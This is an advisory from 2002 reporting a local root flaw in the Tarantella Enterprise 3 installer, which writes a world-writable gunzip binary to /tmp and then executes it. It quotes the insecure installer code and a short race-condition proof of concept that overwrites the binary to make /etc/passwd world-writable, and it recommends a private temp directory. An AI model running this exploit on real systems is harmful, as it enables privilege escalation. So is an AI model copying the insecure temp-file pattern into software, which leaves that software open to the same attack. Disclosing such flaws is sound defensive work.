======Vulnerability report for Tarantella Enterprise 3======

//1/14/2002//

**1. local root compromise during installation:**

The installation script provided with tarentella handles utility
packages during installation insecurely.   A root owned binary "gunzip"
is created in /tmp with world writeable permissions, the pid is appended
to the filename.


TMP_GUNZIP=$TMPDIR/gunzip$$

$ ls -l /tmp/gunzip16152
--rwxrwxrwx    1 root     root        51808 Jan 14 00:15 gunzip16152

gunzip is extracted:
		    extract gunzip > "$TMP_GUNZIP" 2>>$SHXLOGFILE
		    extract gunzip | uncompress > "$TMP_GUNZIP" 2>>$SHXLOGFILE

The permissions of gunzip are changed to rwx for all:
	    chmod 777 $TMP_GUNZIP >/dev/null 2>&1
The binary is used during installation:
	    extract $efilename | $TMP_GUNZIP -q > "$efilename"

**2. Exploit:**

There is a race condition between when gunzip is extracted and used during
installation.  At which time a malicious local user could inject code to
compromise the system quickly.

$ echo "#!/bin/sh" > /tmp/test.sh
$ echo "chmod 777 /etc/passwd" >> /tmp/test.sh

$ cat /tmp/test.sh > /tmp/gunzip16152

I was able to change the permissions of /etc/passwd to 777 by performing the
above as an unpriviledged user.

**3. Recommendations:**

Perhaps create a directory in /tmp or /var/tmp and use that directory as a
work place?

umask 077
mkdir /tmp/workdir

**4. Software: Tarantella Enterprise 3**

http://www.tarantella.com/download/e3/